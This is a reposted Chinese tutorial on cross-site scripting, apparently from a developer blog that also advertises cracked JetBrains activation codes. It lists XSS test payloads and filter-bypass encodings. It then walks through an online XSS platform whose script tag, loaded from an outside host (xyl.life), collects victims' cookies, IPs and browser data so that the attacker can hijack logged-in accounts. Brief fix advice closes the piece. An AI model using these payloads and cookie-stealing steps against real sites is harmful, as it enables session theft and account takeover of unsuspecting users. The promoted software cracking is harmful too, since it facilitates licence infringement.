xss平台使用方法_简单介绍一种你在家使用过的工具

xss平台使用方法_简单介绍一种你在家使用过的工具XSS常用语句及编码绕过XSS常用的测试语句有:<script>alert(1)</script><imgsrc=xonerror=alert(1)>&

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

XSS常用语句及编码绕过

XSS常用的测试语句有:

  • <script>alert(1)</script>
  • <img src=x onerror=alert(1)>
  • <svg onload=alert(1)>
  • <a href=javascript:alert(1)>
    常见的XSS的绕过编码有JS编码、HTML实体编码和URL编码

JS编码

JS提供了四种字符编码的策略,如下所示。

  • 三个八进制数字,如果个数不够,在前面补0,例如“e” 的编码为“\145” ;
  • 两个十六进制数字,如果个数不够,在前面补0,例如”e” 的编码为”\x65″ ;
  • 四个十六进制数字,如果个数不够,在前面补0,例如”e” 的编码为“\u0065”;
  • 对于一些控制字符,使用特殊的C类型的转义风格(例如和\r) 。

HTML实体编码

  • 命名实体:以&开头,以分号结尾的,例如”<“的编码是”<” 。
  • 字符编码:十进制、十六进制ASCII码或Unicode字符编码,样式为”&#数值;”,例如”<” 可以编码为 “<” 和”<“

URL编码

这里的URL编码,也是两次URL全编码的结果。如果alert被过滤,结果为%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34。
在使用XSS编码测试时,需要考虑HTML渲染的顺序,特别是针对多种编码组合时,要选择合适的编码方式进行测试。

使用XSS平台测试XSS漏洞

XSS在线平台
首先在XSS平台注册账并登录,单击”我的项目”中的“创建” 按钮,页面中的名称和描述是分类的,随意填写即可。
xss平台使用方法_简单介绍一种你在家使用过的工具

勾选“默认模块”选项后单击”下一步”按钮。这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。这里说明一下,注意上方的红框,这里最好是复制上方第一个红色方框中的内容,例如:<sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 这个就是项目给你的代码,这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。
xss平台使用方法_简单介绍一种你在家使用过的工具

这里还要说明一下,其实<sCRiPt sRC=//xyl.life/xxxx></sCrIpT>当网站前面是//的时候,代码会自动适配网站,如果对方网站是https的那么代码会自动从https加载,如果对方网站是http的那么代码会从http加载。所以,默认的这种方式是最好的插入方式。页面上显示了多种利用代码,在实际情况中, 一般会根据HTML源码选择合适的利用代码,以此构造浏览器能够执行的代码,这里选择第二种利用代码。
xss平台使用方法_简单介绍一种你在家使用过的工具

将利用代码插入到存在XSS漏洞的URL后,检查浏览器缓存加载文件。发现浏览器成功执行XSS的利用代码
xss平台使用方法_简单介绍一种你在家使用过的工具

然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。
回到XSS平台,可以看到我们已经获取了信息,其中包含来源地址、cookie、IP、 浏览器等,如果用户处于登录状态,可修改cookie并进入该用户的账户。

XSS漏洞修复建议

因为XSS漏洞涉及输入和输出两部分,所以其修复也分为两种。

  • 过滤输入的数据,包括 <>on* 等非法字符。
  • 对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/167844.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • latex设置itemize形式以及多层itemize

    latex设置itemize形式以及多层itemizehttp://tex.stackexchange.com/questions/48036/how-to-represent-cross-and-tick-in-itemize-bullets转载于:https://www.cnblogs.com/sumile123/p/5545104.html

  • Oracle备份的几种方式【转】[通俗易懂]

    Oracle备份的几种方式【转】[通俗易懂]这里使用Oracle12C来大概演示说明一下rman的基本用法,这里不会深入讨论,因为本人也只是刚刚才接触,只是结合了网上的一些文章以及自己的实践来总结并拿出来大家学习,谢谢目录一、关于备份与恢

  • MYSQL EXPLAIN结果详解

    MYSQL EXPLAIN结果详解EXPLAIN不会告诉你关于触发器、存储过程的信息或用户自定义函数对查询的影响情况。EXPLAIN不考虑各种Cache(缓存)。EXPLAIN不能显示MySQL在执行查询时所作的优化工作。部分统计信息是估算的,并非精确值。 EXPALIN只能解释SELECT操作,其他操作要重写为SELECT后查看执行计划。1idselect的识别符,这是select的查询序列号。如果有两列数据id相同,则为同一组查询,由上到下执行。如果id值不同,id值越大,优先级越高。2select_type

  • numpy如何求矩阵的逆_numpy矩阵

    numpy如何求矩阵的逆_numpy矩阵1.矩阵求逆importnumpyasnpa=np.array([[1,2],[3,4]])#初始化一个非奇异矩阵print(a.I)print(np.linalg.inv(a))#与上一步等同,对应于MATLAB中inv()函数2.矩阵求伪逆importnumpyasnp#定义一个奇异阵AA=np.zeros((4,…

  • java激活码_在线激活

    (java激活码)最近有小伙伴私信我,问我这边有没有免费的intellijIdea的激活码,然后我将全栈君台教程分享给他了。激活成功之后他一直表示感谢,哈哈~https://javaforall.cn/100143.htmlIntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,上面是详细链接哦~S32P…

  • CDN之GSLB详解

    CDN之GSLB详解CDN的关键技术主要有内容路由技术、内容分发技术、内容存储技术、内容管理技术等,而本文介绍的GSLB是属于CDN中的内容路由技术的关键技术。一、内容路由技术简介:CDN负载均衡系统实现C…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号